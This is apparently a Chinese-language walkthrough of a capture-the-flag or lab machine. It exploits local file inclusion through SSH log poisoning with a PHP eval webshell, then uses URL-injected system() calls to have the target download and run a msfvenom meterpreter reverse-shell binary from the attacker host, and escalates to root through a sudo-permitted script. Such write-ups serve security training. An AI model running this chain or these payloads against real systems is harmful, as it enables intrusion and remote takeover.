网络发现
开放着22,80端口
在浏览器中打开 IP 地址
目录扫描
dirsearch -u http://192.168.111.138/
/about.php,发现该网站存在这么一个url,疑似存在LFI(本地文件包含)漏洞;
对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破
标记之后,加入文件包含可能存在的文件的字典
/usr/local/apache2/logs/access_log
/logs/access_log
/etc/httpd/logs/access_log
/var/log/httpd/access_log
/var/log/auth.log
利用ssh登录产生错误日志写入一句话木马
ssh '<?php eval($_GET[d1no]);?>'@192.168.111.138
访问执行命令
获取shell
用msfvenom生成 shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.111.147 LPORT=1234 -f elf > shell.elf
开启监听
#开启环境
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.111.147
set lport 1234
run
在下载的shell.elf文件下面开启web服务,进行远程下载
python3 -m http.server
利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令
/?file=/var/log/auth.log&d1no=system('wget+192.168.111.147:8000/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b
三条命令执行完之后,发现监听成功
提权
#进入shell环境
shell
python -c 'import pty;pty.spawn("/bin/bash")'
查询一下sudo提权
sudo -l
发现xxxlogauditorxxx.py 可以以 root 运行。
执行命令
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami